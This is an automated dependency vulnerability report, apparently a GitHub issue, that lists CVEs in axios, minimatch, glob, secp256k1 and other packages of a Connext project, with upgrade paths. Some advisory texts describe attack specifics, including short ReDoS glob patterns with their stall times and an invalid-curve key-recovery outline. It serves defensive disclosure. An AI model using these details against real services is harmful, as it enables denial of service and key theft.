          • secp256k1-4.0.3.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • web3.js-1.52.0.tgz
        • secp256k1-4.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

secp256k1-node is a Node.js binding for an Optimized C library for EC operations on curve secp256k1. In "elliptic"-based version, "loadUncompressedPublicKey" has a check that the public key is on the curve. Prior to versions 5.0.1, 4.0.4, and 3.8.1, however, "loadCompressedPublicKey" is missing that check. That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute power. Other operations on public keys are also affected, including e.g. "publicKeyVerify()" incorrectly returning "true" on those invalid keys, and e.g. "publicKeyTweakMul()" also returning predictable outcomes allowing to restore the tweak. Versions 5.0.1, 4.0.4, and 3.8.1 contain a fix for the issue.

Publish Date: Oct 21, 2024 03:41 PM

URL: CVE-2024-48930

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution :

🔴CVE-2024-52798

Vulnerable Library - path-to-regexp-0.1.7.tgz

Express style path to RegExp utility

Library home page: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.7.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-bzz-1.10.4.tgz
          • swarm-js-0.1.42.tgz
            • eth-lib-0.1.29.tgz
              • servify-0.1.12.tgz
                • express-4.18.3.tgz
                  • path-to-regexp-0.1.7.tgz (Vulnerable Library)

  • @connext/cartographer-poller-2.0.0.tgz (Root Library)

    • dd-trace-3.13.2.tgz
      • path-to-regexp-0.1.7.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. The regular expression that is vulnerable to backtracking can be generated in the 0.1.x release of path-to-regexp. Upgrade to 0.1.12. This vulnerability exists because of an incomplete fix for CVE-2024-45296.

Publish Date: Dec 05, 2024 10:45 PM

URL: CVE-2024-52798

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-rhx6-c78j-4q9w

Release Date: Dec 05, 2024 10:45 PM

Fix Resolution : path-to-regexp - 0.1.12

🔴CVE-2025-27152

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

  • @connext/nxtp-integration-2.0.0.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.

Publish Date: Mar 07, 2025 03:13 PM

URL: CVE-2025-27152

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-jr5f-v2jv-69x6

Release Date: Mar 07, 2025 03:13 PM

Fix Resolution : axios - 0.30.0,axios - 1.8.2,https://github.com/axios/axios.git - v0.30.0,org.webjars.npm:axios:1.8.3,https://github.com/axios/axios.git - v1.8.2

🔴CVE-2025-27611

Vulnerable Library - base-x-3.0.9.tgz

Fast base encoding / decoding of any given alphabet

Library home page: https://registry.npmjs.org/base-x/-/base-x-3.0.9.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-eth-1.10.4.tgz
          • web3-eth-ens-1.10.4.tgz
            • content-hash-2.5.2.tgz
              • multihashes-0.4.21.tgz
                • multibase-0.7.0.tgz
                  • base-x-3.0.9.tgz (Vulnerable Library)

  • @connext/bridge-reference-0.0.1.tgz (Root Library)

    • wallet-sdk-3.5.4.tgz
      • web3.js-1.52.0.tgz
        • borsh-0.7.0.tgz
          • bs58-4.0.1.tgz
            • base-x-3.0.9.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

base-x is a base encoder and decoder of any given alphabet using bitcoin style leading zero compression. Versions 4.0.0, 5.0.0, and all prior to 3.0.11, are vulnerable to attackers potentially deceiving users into sending funds to an unintended address. This issue has been patched in versions 3.0.11, 4.0.1, and 5.0.1.

Publish Date: Apr 30, 2025 07:36 PM

URL: CVE-2025-27611

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-xq7p-g2vc-g82p

Release Date: Apr 30, 2025 07:36 PM

Fix Resolution : base-x - 4.0.1,https://github.com/cryptocoinjs/base-x.git - v5.0.1,base-x - 5.0.1,base-x - 3.0.11,https://github.com/cryptocoinjs/base-x.git - v4.0.1,https://github.com/cryptocoinjs/base-x.git - v3.0.11

🔴CVE-2025-57330

Vulnerable Library - web3-core-subscriptions-1.10.4.tgz

Library home page: https://registry.npmjs.org/web3-core-subscriptions/-/web3-core-subscriptions-1.10.4.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)
    • maticjs-web3-1.0.4.tgz
      • web3-1.10.4.tgz
        • web3-shh-1.10.4.tgz
          • web3-core-subscriptions-1.10.4.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

The web3-core-subscriptions is a package designed to manages web3 subscriptions. A Prototype Pollution vulnerability in the attachToObject function of web3-core-subscriptions version 1.10.4 and before allows attackers to inject properties on Object.prototype via supplying a crafted payload, causing denial of service (DoS) as the minimum consequence.

Publish Date: Sep 24, 2025 12:00 AM

URL: CVE-2025-57330

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin:

Release Date:

Fix Resolution :

🔴CVE-2025-58754

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

  • @connext/nxtp-integration-2.0.0.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Axios is a promise based HTTP client for the browser and Node.js. When Axios starting in version 0.28.0 and prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the "data:" scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory ("Buffer"/"Blob") and returns a synthetic 200 response. This path ignores "maxContentLength" / "maxBodyLength" (which only protect HTTP responses), so an attacker can supply a very large "data:" URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested "responseType: 'stream'". Versions 0.30.2 and 1.12.0 contain a patch for the issue.

Publish Date: Sep 12, 2025 01:16 AM

URL: CVE-2025-58754

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-4hjh-wcwx-xvwj

Release Date: Sep 12, 2025 01:16 AM

Fix Resolution : https://github.com/axios/axios.git - v1.12.0,axios - 0.30.2,axios - 0.30.2,axios - 1.12.0,axios - 1.12.0

🔴CVE-2025-64756

Vulnerable Library - glob-10.3.10.tgz

Library home page: https://registry.npmjs.org/glob/-/glob-10.3.10.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz (Vulnerable Library)

  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)

    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz (Vulnerable Library)

  • @connext/lighthouse-2.0.0.tgz (Root Library)

    • linea-sdk-0.3.0.tgz
      • typeorm-0.3.20.tgz
        • glob-10.3.10.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Nov 17, 2025 05:29 PM

URL: CVE-2025-64756

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-5j98-mcp5-4vw2

Release Date: Nov 17, 2025 05:29 PM

Fix Resolution : glob - 11.1.0,https://github.com/isaacs/node-glob.git - v11.1.0,glob - 10.5.0,https://github.com/isaacs/node-glob.git - v10.5.0

🔴CVE-2026-25639

Vulnerable Library - axios-1.3.3.tgz

Library home page: https://registry.npmjs.org/axios/-/axios-1.3.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

  • @connext/nxtp-integration-2.0.0.tgz (Root Library)

    • axios-1.3.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing proto as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Feb 09, 2026 08:11 PM

URL: CVE-2026-25639

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: axios/axios@28c7215

Release Date: Feb 09, 2026 08:11 PM

Fix Resolution : https://github.com/axios/axios.git - v1.13.5

🔴CVE-2026-26996

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)

  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)

    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions prior to 10.2.1, 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, and 9.0.6 are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS.
This issue has been fixed in versions 10.2.1, 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, and 9.0.6.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: Feb 20, 2026 03:05 AM

URL: CVE-2026-26996

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-3ppc-4f35-3m26

Release Date: Feb 19, 2026 12:56 AM

Fix Resolution : https://github.com/isaacs/minimatch.git - v10.2.1,https://github.com/isaacs/minimatch.git - v5.1.7,https://github.com/isaacs/minimatch.git - v3.1.3,https://github.com/isaacs/minimatch.git - v8.0.5,https://github.com/isaacs/minimatch.git - v4.2.4,https://github.com/isaacs/minimatch.git - v9.0.6,https://github.com/isaacs/minimatch.git - v6.2.1,https://github.com/isaacs/minimatch.git - v7.4.7

🔴CVE-2026-27903

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)

  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)

    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, "matchOne()" performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent "**" (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where "n" is the number of path segments and "k" is the number of globstars. With k=11 and n=30, a call to the default "minimatch()" API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to "minimatch()" is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.

Publish Date: Feb 26, 2026 01:06 AM

URL: CVE-2026-27903

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-7r86-cg39-jmmj

Release Date: Feb 26, 2026 01:06 AM

Fix Resolution : https://github.com/isaacs/minimatch.git - v8.0.6,https://github.com/isaacs/minimatch.git - v6.2.2,https://github.com/isaacs/minimatch.git - v7.4.8,https://github.com/isaacs/minimatch.git - v9.0.7,https://github.com/isaacs/minimatch.git - v10.2.3,https://github.com/isaacs/minimatch.git - v4.2.5,https://github.com/isaacs/minimatch.git - v3.1.3,https://github.com/isaacs/minimatch.git - v5.1.8

🔴CVE-2026-27904

Vulnerable Library - minimatch-9.0.3.tgz

Library home page: https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz

Path to dependency file: /package.json

Dependency Hierarchy:

  • nxtp-utils-2.5.0-alpha.8.tgz (Root Library)

    • secp256k1-4.0.3.tgz
      • node-gyp-10.0.1.tgz
        • glob-10.3.10.tgz
          • minimatch-9.0.3.tgz (Vulnerable Library)

  • @connext/nxtp-adapters-subgraph-2.5.0-alpha.7.tgz (Root Library)

    • client-cli-3.0.0.tgz
      • cli-0.82.35.tgz
        • rimraf-5.0.5.tgz
          • glob-10.3.10.tgz
            • minimatch-9.0.3.tgz (Vulnerable Library)

Reachability Analysis

The vulnerable code is unreachable

Vulnerability Details

minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested "()" extglobs produce regexps with nested unbounded quantifiers (e.g. "(?:(?:a|b))"), which exhibit catastrophic backtracking in V8. With a 12-byte pattern "(((a|b)))" and an 18-byte non-matching input, "minimatch()" stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default "minimatch()" API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects "+()" extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

Publish Date: Feb 26, 2026 01:07 AM

URL: CVE-2026-27904

Threat Assessment

Exploit Maturity:Not Defined

EPSS:< 1%

Score: 7.5

Suggested Fix

Type: Upgrade version

Origin: GHSA-23c5-xmqv-rm74

Release Date: Feb 26, 2026 01:07 AM

Fix Resolution : minimatch - 10.2.3,minimatch - 8.0.6,minimatch - 4.2.5,minimatch - 7.4.8,minimatch - 6.2.2,minimatch - 9.0.7,minimatch - 5.1.8,minimatch - 3.1.4

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions